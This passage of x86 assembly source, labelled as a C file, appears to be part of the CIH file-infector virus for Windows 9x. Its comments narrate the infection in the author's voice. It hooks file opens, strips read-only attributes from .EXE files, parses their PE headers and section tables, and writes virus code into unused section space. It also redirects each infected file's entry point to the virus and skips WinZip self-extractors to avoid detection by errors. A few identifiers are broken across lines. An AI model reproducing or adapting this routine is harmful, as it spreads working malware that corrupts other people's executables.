
📄 046.c

; ************************************* 
; * Is FileName '.EXE' !? * 
; ************************************* 

; cmp [esi+eax-04h], '.EXE' 
cmp [esi+eax-04h], 'EXE.' 
pop esi 
jne DisableOnBusy 

IF DEBUG 

; ************************************* 
; * Only for Debug * 
; ************************************* 

; cmp [esi+eax-06h], 'FUCK' 
cmp [esi+eax-06h], 'KCUF' 
jne DisableOnBusy 

ENDIF 

; ************************************* 
; * Is Open Existing File !? * 
; ************************************* 

; if ( NotOpenExistingFile ) 
; goto DisableOnBusy 
cmp word ptr [ebx+18h], 01h 
jne DisableOnBusy 

; ************************************* 
; * Get Attributes of the File * 
; ************************************* 

mov ax, 4300h 
int 20h ; VXDCall IFSMgr_Ring0_FileIO 
IFSMgr_Ring0_FileIO = $ 
dd 00400032h 

jc DisableOnBusy 

push ecx 

; ************************************* 
; * Get IFSMgr_Ring0_FileIO Address * 
; ************************************* 

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] 
mov edi, [edi] 

; ************************************* 
; * Is Read-Only File !? * 
; ************************************* 

test cl, 01h 
jz OpenFile 

; ************************************* 
; * Modify Read-Only File to Write * 
; ************************************* 

mov ax, 4301h 
xor ecx, ecx 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Open File * 
; ************************************* 

OpenFile: 
xor eax, eax 
mov ah, 0d5h 
xor ecx, ecx 
xor edx, edx 
inc edx 
mov ebx, edx 
inc ebx 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

xchg ebx, eax ; mov ebx, FileHandle 

; ************************************* 
; * Need to Restore * 
; * Attributes of the File !? * 
; ************************************* 

pop ecx 

pushf 

test cl, 01h 
jz IsOpenFileOK 

; ************************************* 
; * Restore Attributes of the File * 
; ************************************* 

mov ax, 4301h 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Is Open File OK !? * 
; ************************************* 

IsOpenFileOK: 
popf 

jc DisableOnBusy 

; ************************************* 
; * Open File Already Succeed. ^__^ * 
; ************************************* 

push esi ; Push FileNameBuffer Address to Stack 

pushf ; Now CF = 0, Push Flag to Stack 

add esi, DataBuffer-@7 ; mov esi, offset DataBuffer 

; *************************** 
; * Get OffsetToNewHeader * 
; *************************** 

xor eax, eax 
mov ah, 0d6h 

; For Doing Minimal VirusCode's Length, 
; I Save EAX to EBP. 
mov ebp, eax 

push 00000004h 
pop ecx 
push 0000003ch 
pop edx 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; * EDX = 'PE\0\0' Signature of * 
; * ImageFileHeader Pointer's * 
; * Former Byte. * 
; * ESI = DataBuffer Address ==> @8 * 
; * EDI = IFSMgr_Ring0_FileIO Address * 
; * EBP = D600h ==> Read Data in File * 
; ************************************* 
; * Stack Dump : * 
; * * 
; * ESP => ------------------------- * 
; * | EFLAG(CF=0) | * 
; * ------------------------- * 
; * | FileNameBufferPointer | * 
; * ------------------------- * 
; * | EDI | * 
; * ------------------------- * 
; * | ESI | * 
; * ------------------------- * 
; * | EBP | * 
; * ------------------------- * 
; * | ESP | * 
; * ------------------------- * 
; * | EBX | * 
; * ------------------------- * 
; * | EDX | * 
; * ------------------------- * 
; * | ECX | * 
; * ------------------------- * 
; * | EAX | * 
; * ------------------------- * 
; * | Return Address | * 
; * ------------------------- * 
; ************************************* 

push ebx ; Save File Handle 

push 00h ; Set VirusCodeSectionTableEndMark 

; *************************** 
; * Let's Set the * 
; * Virus' Infected Mark * 
; *************************** 

push 01h ; Size 
push edx ; Pointer of File 
push edi ; Address of Buffer 

; *************************** 
; * Save ESP Register * 
; *************************** 

mov dr1, esp 

; *************************** 
; * Let's Set the * 
; * NewAddressOfEntryPoint * 
; * ( Only First Set Size ) * 
; *************************** 

push eax ; Size 

; *************************** 
; * Let's Read * 
; * Image Header in File * 
; *************************** 

mov eax, ebp 
mov cl, SizeOfImageHeaderToRead 
add edx, 07h ; Move EDX to NumberOfSections 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; *************************** 
; * Let's Set the * 
; * NewAddressOfEntryPoint * 
; * ( Set Pointer of File, * 
; * Address of Buffer ) * 
; *************************** 

lea eax, (AddressOfEntryPoint-@8)[edx] 
push eax ; Pointer of File 

lea eax, (NewAddressOfEntryPoint-@8)[esi] 
push eax ; Address of Buffer 

; *************************** 
; * Move EDX to the Start * 
; * of SectionTable in File * 
; *************************** 

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] 
lea edx, [eax+edx+12h] 

; *************************** 
; * Let's Get * 
; * Total Size of Sections * 
; *************************** 

mov al, SizeOfScetionTable 

; I Assume NumberOfSections <= 0ffh 
mov cl, (NumberOfSections-@8)[esi] 

mul cl 



; *************************** 

; * Let's Set Section Table * 

; *************************** 

; Move ESI to the Start of SectionTable 
lea esi, (StartOfSectionTable-@8)[esi] 

push eax ; Size 
push edx ; Pointer of File 
push esi ; Address of Buffer 

; *************************** 
; * The Code Size of Merge * 
; * Virus Code Section and * 
; * Total Size of Virus * 
; * Code Section Table Must * 
; * be Small or Equal the * 
; * Unused Space Size of * 
; * Following Section Table * 
; *************************** 

inc ecx 
push ecx ; Save NumberOfSections+1 

shl ecx, 03h 
push ecx ; Save TotalSizeOfVirusCodeSectionTable 

add ecx, eax 
add ecx, edx 

sub ecx, (SizeOfHeaders-@9)[esi] 
not ecx 
inc ecx 

; Save My Virus First Section Code 
; Size of Following Section Table... 
; ( Not Include the Size of Virus Code Section Table ) 
push ecx 

xchg ecx, eax ; ECX = Size of Section Table 

; Save Original Address of Entry Point 
mov eax, (AddressOfEntryPoint-@9)[esi] 
add eax, (ImageBase-@9)[esi] 
mov (OriginalAddressOfEntryPoint-@9)[esi], eax 

cmp word ptr [esp], small CodeSizeOfMergeVirusCodeS 
tion 
jl OnlySetInfectedMark 

; *************************** 
; * Read All Section Tables * 
; *************************** 

mov eax, ebp 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; *************************** 
; * Full Modify the Bug : * 
; * WinZip Self-Extractor * 
; * Occurs Error... * 
; *************************** 
; * So When User Opens * 
; * WinZip Self-Extractor, * 
; * Virus Doesn't Infect it.* 
; *************************** 
; * First, Virus Gets the * 
; * PointerToRawData in the * 
; * Second Section Table, * 
; * Reads the Section Data, * 
; * and Tests the String of * 
; * 'WinZip(R)'...... * 
; *************************** 

xchg eax, ebp 

push 00000004h 
pop ecx 

push edx 
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[e 
] 
add edx, 12h 

call edi ; VXDCall IFSMgr_Ring0_FileIO 

; cmp [esi], 'nZip' 
cmp dword ptr [esi], 'piZn' 
je NotSetInfectedMark 

pop edx 

; *************************** 
; * Let's Set Total Virus * 
; * Code Section Table * 
; *************************** 

; EBX = My Virus First Section Code 
; Size of Following Section Table 
pop ebx 
pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl 
pop ecx ; ECX = NumberOfSections+1 

push edi ; Size 

add edx, ebp 
push edx ; Pointer of File 

add ebp, esi 
push ebp ; Address of Buffer 

; *************************** 
; * Set the First Virus * 
; * Code Section Size in * 
; * VirusCodeSectionTable * 
; *************************** 

lea eax, [ebp+edi-04h] 
mov [eax], ebx 

; *************************** 
; * Let's Set My Virus * 
; * First Section Code * 
; *************************** 

push ebx ; Size 

add edx, edi 
push edx ; Pointer of File 

lea edi, (MyVirusStart-@9)[esi] 
push edi ; Address of Buffer 

; *************************** 
; * Let's Modify the * 
; * AddressOfEntryPoint to * 
; * My Virus Entry Point * 
; *************************** 

mov (NewAddressOfEntryPoint-@9)[esi], edx 

; *************************** 
; * Setup Initial Data * 
; *************************** 

lea edx, [esi-SizeOfScetionTable] 
mov ebp, offset VirusSize 

jmp StartToWriteCodeToSections 

; *************************** 
; * Write Code to Sections * 
; *************************** 

LoopOfWriteCodeToSections: 

add edx, SizeOfScetionTable 

mov ebx, (SizeOfRawData-@9)[edx] 
sub ebx, (VirtualSize-@9)[edx] 
jbe EndOfWriteCodeToSections 

push ebx ; Size 

sub eax, 08h 
mov [eax], ebx 

mov ebx, (PointerToRawData-@9)[edx] 
add ebx, (VirtualSize-@9)[edx] 
push ebx ; Pointer of File 

push edi ; Address of Buffer 

mov ebx, (VirtualSize-@9)[edx] 
add ebx, (VirtualAddress-@9)[edx] 
add ebx, (ImageBase-@9)[esi] 
mov [eax+4], ebx 

mov ebx, [eax] 
add (VirtualSize-@9)[edx], ebx 

; Section contains initialized data ==> 00000040h 
; Section can be Read. ==> 40000000h 
or (Characteristics-@9)[edx], 40000040h 

StartToWriteCodeToSections: 

sub ebp, ebx 
jbe SetVirusCodeSectionTableEndMark 

add edi, ebx ; Move Address of Buffer 

EndOfWriteCodeToSections: 

loop LoopOfWriteCodeToSections 

; *************************** 
; * Only Set Infected Mark * 
; *************************** 
